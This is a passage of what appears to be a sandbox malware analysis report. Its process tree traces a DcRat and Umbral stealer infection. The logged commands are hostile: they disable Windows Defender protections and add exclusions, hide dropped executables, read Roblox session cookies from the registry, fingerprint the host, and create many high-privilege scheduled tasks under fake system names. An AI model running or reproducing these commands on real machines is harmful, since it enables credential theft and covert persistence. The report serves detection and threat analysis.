                                                                          • System Location Discovery: System Language Discovery
                                                                          • Modifies registry class
                                                                          • Suspicious use of WriteProcessMemory
                                                                          PID:4784
                                                                          • C:\Windows\SysWOW64\WScript.exe
                                                                            "C:\Windows\System32\WScript.exe" "C:\PortsurrogateWinhostdhcp\ya0aIw.vbe"
                                                                            8⤵
                                                                            • Checks computer location settings
                                                                            • System Location Discovery: System Language Discovery
                                                                            • Suspicious use of WriteProcessMemory
                                                                            PID:3652
                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                              C:\Windows\system32\cmd.exe /c ""C:\PortsurrogateWinhostdhcp\AW1Fe6Q61HGStQsO0.bat" "
                                                                              9⤵
                                                                              • System Location Discovery: System Language Discovery
                                                                              PID:1228
                                                                              • C:\PortsurrogateWinhostdhcp\WebReviewWinSvc.exe
                                                                                "C:\PortsurrogateWinhostdhcp/WebReviewWinSvc.exe"
                                                                                10⤵
                                                                                • Checks computer location settings
                                                                                • Executes dropped EXE
                                                                                • Drops file in Windows directory
                                                                                • Modifies registry class
                                                                                PID:2556
                                                                                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                  "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Windows\es-ES\conhost.exe'
                                                                                  11⤵
                                                                                  • Command and Scripting Interpreter: PowerShell
                                                                                  PID:1076
                                                                                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                  "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Windows\appcompat\encapsulation\StartMenuExperienceHost.exe'
                                                                                  11⤵
                                                                                  • Command and Scripting Interpreter: PowerShell
                                                                                  PID:1356
                                                                                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                  "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\Default User\fontdrvhost.exe'
                                                                                  11⤵
                                                                                  • Command and Scripting Interpreter: PowerShell
                                                                                  PID:1620
                                                                                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                  "powershell" -Command Add-MpPreference -ExclusionPath 'C:\reviewCrt\backgroundTaskHost.exe'
                                                                                  11⤵
                                                                                  • Command and Scripting Interpreter: PowerShell
                                                                                  PID:2912
                                                                                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                  "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Windows\Logs\MoSetup\RuntimeBroker.exe'
                                                                                  11⤵
                                                                                  • Command and Scripting Interpreter: PowerShell
                                                                                  PID:4836
                                                                                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                  "powershell" -Command Add-MpPreference -ExclusionPath 'C:\PortsurrogateWinhostdhcp\WebReviewWinSvc.exe'
                                                                                  11⤵
                                                                                  • Command and Scripting Interpreter: PowerShell
                                                                                  PID:1760
                                                                                • C:\Windows\System32\cmd.exe
                                                                                  "C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\XTd0h3sawy.bat"
                                                                                  11⤵
                                                                                    PID:3908
                                                                                    • C:\Windows\system32\chcp.com
                                                                                      chcp 65001
                                                                                      12⤵
                                                                                        PID:2492
                                                                                      • C:\Windows\system32\PING.EXE
                                                                                        ping -n 10 localhost
                                                                                        12⤵
                                                                                        • System Network Configuration Discovery: Internet Connection Discovery
                                                                                        • Runs ping.exe
                                                                                        PID:864
                                                                                      • C:\Windows\es-ES\conhost.exe
                                                                                        "C:\Windows\es-ES\conhost.exe"
                                                                                        12⤵
                                                                                        • Executes dropped EXE
                                                                                        PID:2504
                                                                    • C:\Windows\SysWOW64\WScript.exe
                                                                      "C:\Windows\System32\WScript.exe" "C:\reviewCrt\file.vbs"
                                                                      3⤵
                                                                      • System Location Discovery: System Language Discovery
                                                                      PID:1192
                                                                  • C:\Users\Admin\AppData\Local\Temp\installer.exe
                                                                    "C:\Users\Admin\AppData\Local\Temp\installer.exe"
                                                                    2⤵
                                                                    • Checks computer location settings
                                                                    • Executes dropped EXE
                                                                    • System Location Discovery: System Language Discovery
                                                                    • Suspicious use of WriteProcessMemory
                                                                    PID:3172
                                                                    • C:\Users\Admin\AppData\Local\Temp\WmZWbh4b.exe
                                                                      "C:\Users\Admin\AppData\Local\Temp\WmZWbh4b.exe"
                                                                      3⤵
                                                                      • Checks computer location settings
                                                                      • Executes dropped EXE
                                                                      • Adds Run key to start application
                                                                      • Suspicious behavior: EnumeratesProcesses
                                                                      • Suspicious use of AdjustPrivilegeToken
                                                                      • Suspicious use of WriteProcessMemory
                                                                      PID:2612
                                                                      • C:\Windows\System32\attrib.exe
                                                                        "C:\Windows\System32\attrib.exe" +s +h "C:\Users\Admin\Exec"
                                                                        4⤵
                                                                        • Sets file to hidden
                                                                        • Views/modifies file attributes
                                                                        PID:3236
                                                                      • C:\Windows\System32\attrib.exe
                                                                        "C:\Windows\System32\attrib.exe" +s +h "C:\Users\Admin\Exec\$77svchost.exe"
                                                                        4⤵
                                                                        • Sets file to hidden
                                                                        • Views/modifies file attributes
                                                                        PID:2596
                                                                      • C:\Windows\system32\cmd.exe
                                                                        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tmpD169.tmp.bat""
                                                                        4⤵
                                                                          PID:5056
                                                                          • C:\Windows\system32\timeout.exe
                                                                            timeout 3
                                                                            5⤵
                                                                            • Delays execution with timeout.exe
                                                                            PID:3268
                                                                          • C:\Users\Admin\Exec\$77svchost.exe
                                                                            "C:\Users\Admin\Exec\$77svchost.exe"
                                                                            5⤵
                                                                            • Checks computer location settings
                                                                            • Executes dropped EXE
                                                                            PID:4996
                                                                            • C:\Windows\SYSTEM32\schtasks.exe
                                                                              "schtasks.exe" /query /TN $77svchost.exe
                                                                              6⤵
                                                                                PID:2360
                                                                              • C:\Windows\SYSTEM32\schtasks.exe
                                                                                "schtasks.exe" /Create /SC ONCE /TN "$77svchost.exe" /TR "C:\Users\Admin\Exec\$77svchost.exe \"\$77svchost.exe\" /AsAdmin" /ST 00:01 /IT /F /RL HIGHEST
                                                                                6⤵
                                                                                • DcRat
                                                                                • Scheduled Task/Job: Scheduled Task
                                                                                PID:284
                                                                              • C:\Windows\SYSTEM32\schtasks.exe
                                                                                "schtasks.exe" /query /TN $77svchost.exe
                                                                                6⤵
                                                                                  PID:3212
                                                                                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -ExclusionExtension exe,bat,dll,ps1;exit
                                                                                  6⤵
                                                                                  • Command and Scripting Interpreter: PowerShell
                                                                                  PID:1844
                                                                                • C:\Windows\System32\schtasks.exe
                                                                                  "C:\Windows\System32\schtasks.exe" /create /sc daily /tn "svchost_Task-DAILY-21PM" /TR "%MyFile%" /ST 21:00
                                                                                  6⤵
                                                                                  • DcRat
                                                                                  • Scheduled Task/Job: Scheduled Task
                                                                                  PID:2076
                                                                          • C:\Users\Admin\AppData\Local\Temp\Umbral.exe
                                                                            "C:\Users\Admin\AppData\Local\Temp\Umbral.exe"
                                                                            3⤵
                                                                            • Drops file in Drivers directory
                                                                            • Executes dropped EXE
                                                                            • Suspicious behavior: EnumeratesProcesses
                                                                            • Suspicious use of AdjustPrivilegeToken
                                                                            • Suspicious use of WriteProcessMemory
                                                                            PID:2028
                                                                            • C:\Windows\System32\Wbem\wmic.exe
                                                                              "wmic.exe" csproduct get uuid
                                                                              4⤵
                                                                              • Suspicious use of AdjustPrivilegeToken
                                                                              PID:3592
                                                                            • C:\Windows\SYSTEM32\attrib.exe
                                                                              "attrib.exe" +h +s "C:\Users\Admin\AppData\Local\Temp\Umbral.exe"
                                                                              4⤵
                                                                              • Views/modifies file attributes
                                                                              PID:2604
                                                                            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                              "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Umbral.exe'
                                                                              4⤵
                                                                              • Command and Scripting Interpreter: PowerShell
                                                                              • Suspicious behavior: EnumeratesProcesses
                                                                              • Suspicious use of AdjustPrivilegeToken
                                                                              PID:5044
                                                                            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                              "powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2
                                                                              4⤵
                                                                              • Command and Scripting Interpreter: PowerShell
                                                                              • Suspicious behavior: EnumeratesProcesses
                                                                              • Suspicious use of AdjustPrivilegeToken
                                                                              PID:2304
                                                                            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                              "powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
                                                                              4⤵
                                                                              • Command and Scripting Interpreter: PowerShell
                                                                              • Suspicious behavior: EnumeratesProcesses
                                                                              • Suspicious use of AdjustPrivilegeToken
                                                                              PID:840
                                                                            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                              "powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
                                                                              4⤵
                                                                              • Suspicious behavior: EnumeratesProcesses
                                                                              • Suspicious use of AdjustPrivilegeToken
                                                                              PID:1676
                                                                            • C:\Windows\System32\Wbem\wmic.exe
                                                                              "wmic.exe" os get Caption
                                                                              4⤵
                                                                              • Suspicious use of AdjustPrivilegeToken
                                                                              PID:976
                                                                            • C:\Windows\System32\Wbem\wmic.exe
                                                                              "wmic.exe" computersystem get totalphysicalmemory
                                                                              4⤵
                                                                                PID:4392
                                                                              • C:\Windows\System32\Wbem\wmic.exe
                                                                                "wmic.exe" csproduct get uuid
                                                                                4⤵
                                                                                  PID:2904
                                                                                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                  "powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
                                                                                  4⤵
                                                                                  • Command and Scripting Interpreter: PowerShell
                                                                                  • Suspicious behavior: EnumeratesProcesses
                                                                                  PID:636
                                                                                • C:\Windows\System32\Wbem\wmic.exe
                                                                                  "wmic" path win32_VideoController get name
                                                                                  4⤵
                                                                                  • Detects videocard installed
                                                                                  PID:2324
                                                                                • C:\Windows\SYSTEM32\cmd.exe
                                                                                  "cmd.exe" /c ping localhost && del /F /A h "C:\Users\Admin\AppData\Local\Temp\Umbral.exe" && pause
                                                                                  4⤵
                                                                                  • System Network Configuration Discovery: Internet Connection Discovery
                                                                                  • Suspicious use of WriteProcessMemory
                                                                                  PID:1960
                                                                                  • C:\Windows\system32\PING.EXE
                                                                                    ping localhost
                                                                                    5⤵
                                                                                    • System Network Configuration Discovery: Internet Connection Discovery
                                                                                    • Runs ping.exe
                                                                                    PID:292
                                                                          • C:\Windows\system32\schtasks.exe
                                                                            schtasks.exe /create /tn "dllhostd" /sc MINUTE /mo 5 /tr "'C:\Users\All Users\Mozilla-1de4eec8-1241-4177-a864-e594e8d1fb38\updates\308046B0AF4A39CB\dllhost.exe'" /f
                                                                            1⤵
                                                                            • DcRat
                                                                            • Process spawned unexpected child process
                                                                            • Scheduled Task/Job: Scheduled Task
                                                                            PID:224
                                                                          • C:\Windows\system32\schtasks.exe
                                                                            schtasks.exe /create /tn "dllhost" /sc ONLOGON /tr "'C:\Users\All Users\Mozilla-1de4eec8-1241-4177-a864-e594e8d1fb38\updates\308046B0AF4A39CB\dllhost.exe'" /rl HIGHEST /f
                                                                            1⤵
                                                                            • DcRat
                                                                            • Process spawned unexpected child process
                                                                            • Scheduled Task/Job: Scheduled Task
                                                                            PID:2880
                                                                          • C:\Windows\system32\schtasks.exe
                                                                            schtasks.exe /create /tn "dllhostd" /sc MINUTE /mo 7 /tr "'C:\Users\All Users\Mozilla-1de4eec8-1241-4177-a864-e594e8d1fb38\updates\308046B0AF4A39CB\dllhost.exe'" /rl HIGHEST /f
                                                                            1⤵
                                                                            • DcRat
                                                                            • Process spawned unexpected child process
                                                                            • Scheduled Task/Job: Scheduled Task
                                                                            PID:4344
                                                                          • C:\Windows\system32\schtasks.exe
                                                                            schtasks.exe /create /tn "IdleI" /sc MINUTE /mo 5 /tr "'C:\Windows\Fonts\Idle.exe'" /f
                                                                            1⤵
                                                                            • DcRat
                                                                            • Process spawned unexpected child process
                                                                            • Scheduled Task/Job: Scheduled Task
                                                                            PID:4132
                                                                          • C:\Windows\system32\schtasks.exe
                                                                            schtasks.exe /create /tn "Idle" /sc ONLOGON /tr "'C:\Windows\Fonts\Idle.exe'" /rl HIGHEST /f
                                                                            1⤵
                                                                            • DcRat
                                                                            • Process spawned unexpected child process
                                                                            • Scheduled Task/Job: Scheduled Task
                                                                            PID:3236
                                                                          • C:\Windows\system32\schtasks.exe
                                                                            schtasks.exe /create /tn "IdleI" /sc MINUTE /mo 13 /tr "'C:\Windows\Fonts\Idle.exe'" /rl HIGHEST /f
                                                                            1⤵
                                                                            • DcRat
                                                                            • Process spawned unexpected child process
                                                                            • Scheduled Task/Job: Scheduled Task
                                                                            PID:4608
                                                                          • C:\Windows\system32\vssvc.exe
                                                                            C:\Windows\system32\vssvc.exe
                                                                            1⤵
                                                                            • Suspicious use of AdjustPrivilegeToken
                                                                            PID:1456
                                                                          • C:\Windows\system32\schtasks.exe
                                                                            schtasks.exe /create /tn "RegistryR" /sc MINUTE /mo 10 /tr "'C:\Windows\Installer\{AC76BA86-7AD7-1033-7B44-AC0F074E4100}\Registry.exe'" /f
                                                                            1⤵
                                                                            • DcRat
                                                                            • Process spawned unexpected child process
                                                                            • Scheduled Task/Job: Scheduled Task
                                                                            PID:4932
                                                                          • C:\Windows\system32\schtasks.exe
                                                                            schtasks.exe /create /tn "Registry" /sc ONLOGON /tr "'C:\Windows\Installer\{AC76BA86-7AD7-1033-7B44-AC0F074E4100}\Registry.exe'" /rl HIGHEST /f
                                                                            1⤵
                                                                            • DcRat
                                                                            • Process spawned unexpected child process
                                                                            • Scheduled Task/Job: Scheduled Task
                                                                            PID:572
                                                                          • C:\Windows\system32\schtasks.exe
                                                                            schtasks.exe /create /tn "RegistryR" /sc MINUTE /mo 12 /tr "'C:\Windows\Installer\{AC76BA86-7AD7-1033-7B44-AC0F074E4100}\Registry.exe'" /rl HIGHEST /f
                                                                            1⤵
                                                                            • DcRat
                                                                            • Process spawned unexpected child process
                                                                            • Scheduled Task/Job: Scheduled Task
                                                                            PID:3960
                                                                          • C:\Windows\system32\schtasks.exe
                                                                            schtasks.exe /create /tn "explorere" /sc MINUTE /mo 8 /tr "'C:\Users\All Users\explorer.exe'" /f
                                                                            1⤵
                                                                            • DcRat
                                                                            • Process spawned unexpected child process
                                                                            • Scheduled Task/Job: Scheduled Task
                                                                            PID:2344
                                                                          • C:\Windows\system32\schtasks.exe
                                                                            schtasks.exe /create /tn "explorer" /sc ONLOGON /tr "'C:\Users\All Users\explorer.exe'" /rl HIGHEST /f
                                                                            1⤵
                                                                            • DcRat
                                                                            • Process spawned unexpected child process
                                                                            • Scheduled Task/Job: Scheduled Task
                                                                            PID:3908
                                                                          • C:\Windows\system32\schtasks.exe
                                                                            schtasks.exe /create /tn "explorere" /sc MINUTE /mo 10 /tr "'C:\Users\All Users\explorer.exe'" /rl HIGHEST /f
                                                                            1⤵
                                                                            • DcRat
                                                                            • Process spawned unexpected child process
                                                                            • Scheduled Task/Job: Scheduled Task
                                                                            PID:2604
                                                                          • C:\Windows\system32\schtasks.exe
                                                                            schtasks.exe /create /tn "dllhostd" /sc MINUTE /mo 8 /tr "'C:\Recovery\WindowsRE\dllhost.exe'" /f
                                                                            1⤵
                                                                            • DcRat
                                                                            • Process spawned unexpected child process
                                                                            • Scheduled Task/Job: Scheduled Task
                                                                            PID:4840
                                                                          • C:\Windows\system32\schtasks.exe
                                                                            schtasks.exe /create /tn "dllhost" /sc ONLOGON /tr "'C:\Recovery\WindowsRE\dllhost.exe'" /rl HIGHEST /f
                                                                            1⤵
                                                                            • DcRat
                                                                            • Process spawned unexpected child process
                                                                            • Scheduled Task/Job: Scheduled Task
                                                                            PID:2368
                                                                          • C:\Windows\system32\schtasks.exe
                                                                            schtasks.exe /create /tn "dllhostd" /sc MINUTE /mo 7 /tr "'C:\Recovery\WindowsRE\dllhost.exe'" /rl HIGHEST /f
                                                                            1⤵
                                                                            • DcRat
                                                                            • Process spawned unexpected child process
                                                                            • Scheduled Task/Job: Scheduled Task
                                                                            PID:4328
                                                                          • C:\Windows\system32\schtasks.exe
                                                                            schtasks.exe /create /tn "IdleI" /sc MINUTE /mo 5 /tr "'C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\Idle.exe'" /f
                                                                            1⤵
                                                                            • DcRat
                                                                            • Process spawned unexpected child process
                                                                            • Scheduled Task/Job: Scheduled Task
                                                                            PID:2816
                                                                          • C:\Windows\system32\schtasks.exe
                                                                            schtasks.exe /create /tn "Idle" /sc ONLOGON /tr "'C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\Idle.exe'" /rl HIGHEST /f
                                                                            1⤵
                                                                            • DcRat
                                                                            • Process spawned unexpected child process
                                                                            • Scheduled Task/Job: Scheduled Task
                                                                            PID:456
                                                                          • C:\Windows\system32\schtasks.exe
                                                                            schtasks.exe /create /tn "IdleI" /sc MINUTE /mo 8 /tr "'C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\Idle.exe'" /rl HIGHEST /f
                                                                            1⤵
                                                                            • DcRat
                                                                            • Process spawned unexpected child process
                                                                            • Scheduled Task/Job: Scheduled Task
                                                                            PID:612
                                                                          • C:\Windows\system32\schtasks.exe
                                                                            schtasks.exe /create /tn "RuntimeBrokerR" /sc MINUTE /mo 10 /tr "'C:\Recovery\WindowsRE\RuntimeBroker.exe'" /f
                                                                            1⤵
                                                                            • DcRat
                                                                            • Process spawned unexpected child process
                                                                            • Scheduled Task/Job: Scheduled Task
                                                                            PID:4564
                                                                          • C:\Windows\system32\schtasks.exe
                                                                            schtasks.exe /create /tn "RuntimeBroker" /sc ONLOGON /tr "'C:\Recovery\WindowsRE\RuntimeBroker.exe'" /rl HIGHEST /f
                                                                            1⤵
                                                                            • DcRat
                                                                            • Process spawned unexpected child process
                                                                            • Scheduled Task/Job: Scheduled Task
                                                                            PID:2968
                                                                          • C:\Windows\system32\schtasks.exe
                                                                            schtasks.exe /create /tn "RuntimeBrokerR" /sc MINUTE /mo 10 /tr "'C:\Recovery\WindowsRE\RuntimeBroker.exe'" /rl HIGHEST /f
                                                                            1⤵
                                                                            • DcRat
                                                                            • Process spawned unexpected child process
                                                                            • Scheduled Task/Job: Scheduled Task
                                                                            PID:4820
                                                                          • C:\Windows\system32\schtasks.exe
                                                                            schtasks.exe /create /tn "backgroundTaskHostb" /sc MINUTE /mo 13 /tr "'C:\Users\All Users\Adobe\Setup\{AC76BA86-7AD7-1033-7B44-AC0F074E4100}\backgroundTaskHost.exe'" /f
                                                                            1⤵
                                                                            • DcRat
                                                                            • Process spawned unexpected child process
                                                                            • Scheduled Task/Job: Scheduled Task
                                                                            PID:2520
                                                                          • C:\Windows\system32\schtasks.exe
                                                                            schtasks.exe /create /tn "backgroundTaskHost" /sc ONLOGON /tr "'C:\Users\All Users\Adobe\Setup\{AC76BA86-7AD7-1033-7B44-AC0F074E4100}\backgroundTaskHost.exe'" /rl HIGHEST /f
                                                                            1⤵
                                                                            • DcRat
                                                                            • Process spawned unexpected child process
                                                                            • Scheduled Task/Job: Scheduled Task
                                                                            PID:1508
                                                                          • C:\Windows\system32\schtasks.exe
                                                                            schtasks.exe /create /tn "backgroundTaskHostb" /sc MINUTE /mo 5 /tr "'C:\Users\All Users\Adobe\Setup\{AC76BA86-7AD7-1033-7B44-AC0F074E4100}\backgroundTaskHost.exe'" /rl HIGHEST /f
                                                                            1⤵
                                                                            • DcRat
                                                                            • Process spawned unexpected child process
                                                                            • Scheduled Task/Job: Scheduled Task
                                                                            PID:4724
                                                                          • C:\Windows\system32\schtasks.exe
                                                                            schtasks.exe /create /tn "RuntimeBrokerR" /sc MINUTE /mo 11 /tr "'C:\Windows\System32\ti-et\RuntimeBroker.exe'" /f
                                                                            1⤵
                                                                            • DcRat
                                                                            • Process spawned unexpected child process
                                                                            • Scheduled Task/Job: Scheduled Task
                                                                            PID:1356
                                                                          • C:\Windows\system32\schtasks.exe
                                                                            schtasks.exe /create /tn "RuntimeBroker" /sc ONLOGON /tr "'C:\Windows\System32\ti-et\RuntimeBroker.exe'" /rl HIGHEST /f
                                                                            1⤵
                                                                            • DcRat
                                                                            • Process spawned unexpected child process
                                                                            • Scheduled Task/Job: Scheduled Task
                                                                            PID:4344
                                                                          • C:\Windows\system32\schtasks.exe
                                                                            schtasks.exe /create /tn "RuntimeBrokerR" /sc MINUTE /mo 14 /tr "'C:\Windows\System32\ti-et\RuntimeBroker.exe'" /rl HIGHEST /f
                                                                            1⤵
                                                                            • DcRat
                                                                            • Process spawned unexpected child process
                                                                            • Scheduled Task/Job: Scheduled Task
                                                                            PID:3828
                                                                          • C:\Windows\system32\schtasks.exe
                                                                            schtasks.exe /create /tn "SearchAppS" /sc MINUTE /mo 9 /tr "'C:\Program Files (x86)\Common Files\SearchApp.exe'" /f
                                                                            1⤵
                                                                            • DcRat
                                                                            • Process spawned unexpected child process
                                                                            • Scheduled Task/Job: Scheduled Task
                                                                            PID:4040
                                                                          • C:\Windows\system32\schtasks.exe
                                                                            schtasks.exe /create /tn "SearchApp" /sc ONLOGON /tr "'C:\Program Files (x86)\Common Files\SearchApp.exe'" /rl HIGHEST /f
                                                                            1⤵
                                                                            • DcRat
                                                                            • Process spawned unexpected child process
                                                                            • Scheduled Task/Job: Scheduled Task
                                                                            PID:3960
                                                                          • C:\Windows\system32\schtasks.exe
                                                                            schtasks.exe /create /tn "SearchAppS" /sc MINUTE /mo 6 /tr "'C:\Program Files (x86)\Common Files\SearchApp.exe'" /rl HIGHEST /f
                                                                            1⤵
                                                                            • DcRat
                                                                            • Process spawned unexpected child process
                                                                            • Scheduled Task/Job: Scheduled Task
                                                                            PID:1404
                                                                          • C:\Windows\system32\schtasks.exe
                                                                            schtasks.exe /create /tn "dllhostd" /sc MINUTE /mo 10 /tr "'C:\Recovery\WindowsRE\dllhost.exe'" /f
                                                                            1⤵
                                                                            • DcRat
                                                                            • Process spawned unexpected child process
                                                                            • Scheduled Task/Job: Scheduled Task
                                                                            PID:2324
                                                                          • C:\Windows\system32\schtasks.exe
                                                                            schtasks.exe /create /tn "dllhost" /sc ONLOGON /tr "'C:\Recovery\WindowsRE\dllhost.exe'" /rl HIGHEST /f
                                                                            1⤵
                                                                            • DcRat
                                                                            • Process spawned unexpected child process
                                                                            • Scheduled Task/Job: Scheduled Task
                                                                            PID:1940
                                                                          • C:\Windows\system32\schtasks.exe
                                                                            schtasks.exe /create /tn "dllhostd" /sc MINUTE /mo 7 /tr "'C:\Recovery\WindowsRE\dllhost.exe'" /rl HIGHEST /f
                                                                            1⤵
                                                                            • DcRat
                                                                            • Process spawned unexpected child process
                                                                            • Scheduled Task/Job: Scheduled Task
                                                                            PID:2076
                                                                          • C:\Windows\system32\schtasks.exe
                                                                            schtasks.exe /create /tn "fontdrvhostf" /sc MINUTE /mo 10 /tr "'C:\Recovery\WindowsRE\fontdrvhost.exe'" /f
                                                                            1⤵
                                                                            • DcRat
                                                                            • Process spawned unexpected child process
                                                                            • Scheduled Task/Job: Scheduled Task
                                                                            PID:3600
                                                                          • C:\Windows\system32\schtasks.exe
                                                                            schtasks.exe /create /tn "fontdrvhost" /sc ONLOGON /tr "'C:\Recovery\WindowsRE\fontdrvhost.exe'" /rl HIGHEST /f
                                                                            1⤵
                                                                            • DcRat
                                                                            • Process spawned unexpected child process
                                                                            • Scheduled Task/Job: Scheduled Task
                                                                            PID:3588
                                                                          • C:\Windows\system32\schtasks.exe
                                                                            schtasks.exe /create /tn "fontdrvhostf" /sc MINUTE /mo 11 /tr "'C:\Recovery\WindowsRE\fontdrvhost.exe'" /rl HIGHEST /f
                                                                            1⤵
                                                                            • DcRat
                                                                            • Process spawned unexpected child process
                                                                            • Scheduled Task/Job: Scheduled Task
                                                                            PID:2660
                                                                          • C:\Windows\system32\schtasks.exe
                                                                            schtasks.exe /create /tn "conhostc" /sc MINUTE /mo 8 /tr "'C:\Windows\es-ES\conhost.exe'" /f
                                                                            1⤵
                                                                            • DcRat
                                                                            • Process spawned unexpected child process
                                                                            • Scheduled Task/Job: Scheduled Task
                                                                            PID:4288
                                                                          • C:\Windows\system32\schtasks.exe
                                                                            schtasks.exe /create /tn "conhost" /sc ONLOGON /tr "'C:\Windows\es-ES\conhost.exe'" /rl HIGHEST /f
                                                                            1⤵
                                                                            • DcRat
                                                                            • Process spawned unexpected child process
                                                                            • Scheduled Task/Job: Scheduled Task
                                                                            PID:1776
                                                                          • C:\Windows\system32\schtasks.exe
                                                                            schtasks.exe /create /tn "conhostc" /sc MINUTE /mo 11 /tr "'C:\Windows\es-ES\conhost.exe'" /rl HIGHEST /f
                                                                            1⤵
                                                                            • DcRat
                                                                            • Process spawned unexpected child process
                                                                            • Scheduled Task/Job: Scheduled Task
                                                                            PID:1716
                                                                          • C:\Windows\system32\schtasks.exe
                                                                            schtasks.exe /create /tn "StartMenuExperienceHostS" /sc MINUTE /mo 7 /tr "'C:\Windows\appcompat\encapsulation\StartMenuExperienceHost.exe'" /f
                                                                            1⤵
                                                                            • DcRat
                                                                            • Process spawned unexpected child process
                                                                            • Scheduled Task/Job: Scheduled Task
                                                                            PID:4500
                                                                          • C:\Windows\system32\schtasks.exe
                                                                            schtasks.exe /create /tn "StartMenuExperienceHost" /sc ONLOGON /tr "'C:\Windows\appcompat\encapsulation\StartMenuExperienceHost.exe'" /rl HIGHEST /f
                                                                            1⤵
                                                                            • DcRat
                                                                            • Process spawned unexpected child process
                                                                            • Scheduled Task/Job: Scheduled Task
                                                                            PID:1124
                                                                          • C:\Windows\system32\schtasks.exe
                                                                            schtasks.exe /create /tn "StartMenuExperienceHostS" /sc MINUTE /mo 11 /tr "'C:\Windows\appcompat\encapsulation\StartMenuExperienceHost.exe'" /rl HIGHEST /f
                                                                            1⤵
                                                                            • DcRat
                                                                            • Process spawned unexpected child process
                                                                            • Scheduled Task/Job: Scheduled Task
                                                                            PID:4868
                                                                          • C:\Windows\system32\schtasks.exe
                                                                            schtasks.exe /create /tn "fontdrvhostf" /sc MINUTE /mo 13 /tr "'C:\Users\Default User\fontdrvhost.exe'" /f
                                                                            1⤵
                                                                            • DcRat
                                                                            • Process spawned unexpected child process
                                                                            • Scheduled Task/Job: Scheduled Task
                                                                            PID:1484
                                                                          • C:\Windows\system32\schtasks.exe
                                                                            schtasks.exe /create /tn "fontdrvhost" /sc ONLOGON /tr "'C:\Users\Default User\fontdrvhost.exe'" /rl HIGHEST /f
                                                                            1⤵
                                                                            • DcRat
                                                                            • Process spawned unexpected child process
                                                                            • Scheduled Task/Job: Scheduled Task
                                                                            PID:3512
                                                                          • C:\Windows\system32\schtasks.exe
                                                                            schtasks.exe /create /tn "fontdrvhostf" /sc MINUTE /mo 9 /tr "'C:\Users\Default User\fontdrvhost.exe'" /rl HIGHEST /f
                                                                            1⤵
                                                                            • DcRat
                                                                            • Process spawned unexpected child process
                                                                            • Scheduled Task/Job: Scheduled Task
                                                                            PID:668
                                                                          • C:\Windows\system32\schtasks.exe
                                                                            schtasks.exe /create /tn "backgroundTaskHostb" /sc MINUTE /mo 8 /tr "'C:\reviewCrt\backgroundTaskHost.exe'" /f
                                                                            1⤵
                                                                            • DcRat
                                                                            • Process spawned unexpected child process
                                                                            • Scheduled Task/Job: Scheduled Task
                                                                            PID:2352
                                                                          • C:\Windows\system32\schtasks.exe
                                                                            schtasks.exe /create /tn "backgroundTaskHost" /sc ONLOGON /tr "'C:\reviewCrt\backgroundTaskHost.exe'" /rl HIGHEST /f
                                                                            1⤵
                                                                            • DcRat
                                                                            • Process spawned unexpected child process
                                                                            • Scheduled Task/Job: Scheduled Task
                                                                            PID:4996
                                                                          • C:\Windows\system32\schtasks.exe
                                                                            schtasks.exe /create /tn "backgroundTaskHostb" /sc MINUTE /mo 7 /tr "'C:\reviewCrt\backgroundTaskHost.exe'" /rl HIGHEST /f
                                                                            1⤵
                                                                            • DcRat
                                                                            • Process spawned unexpected child process
                                                                            • Scheduled Task/Job: Scheduled Task
                                                                            PID:5040
                                                                          • C:\Windows\system32\schtasks.exe
                                                                            schtasks.exe /create /tn "RuntimeBrokerR" /sc MINUTE /mo 14 /tr "'C:\Windows\Logs\MoSetup\RuntimeBroker.exe'" /f
                                                                            1⤵
                                                                            • DcRat
                                                                            • Process spawned unexpected child process
                                                                            • Scheduled Task/Job: Scheduled Task
                                                                            PID:2920
                                                                          • C:\Windows\system32\schtasks.exe
                                                                            schtasks.exe /create /tn "RuntimeBroker" /sc ONLOGON /tr "'C:\Windows\Logs\MoSetup\RuntimeBroker.exe'" /rl HIGHEST /f
                                                                            1⤵
                                                                            • DcRat
                                                                            • Process spawned unexpected child process
                                                                            • Scheduled Task/Job: Scheduled Task
                                                                            PID:1944
                                                                          • C:\Windows\system32\schtasks.exe
                                                                            schtasks.exe /create /tn "RuntimeBrokerR" /sc MINUTE /mo 5 /tr "'C:\Windows\Logs\MoSetup\RuntimeBroker.exe'" /rl HIGHEST /f
                                                                            1⤵
                                                                            • DcRat
                                                                            • Process spawned unexpected child process
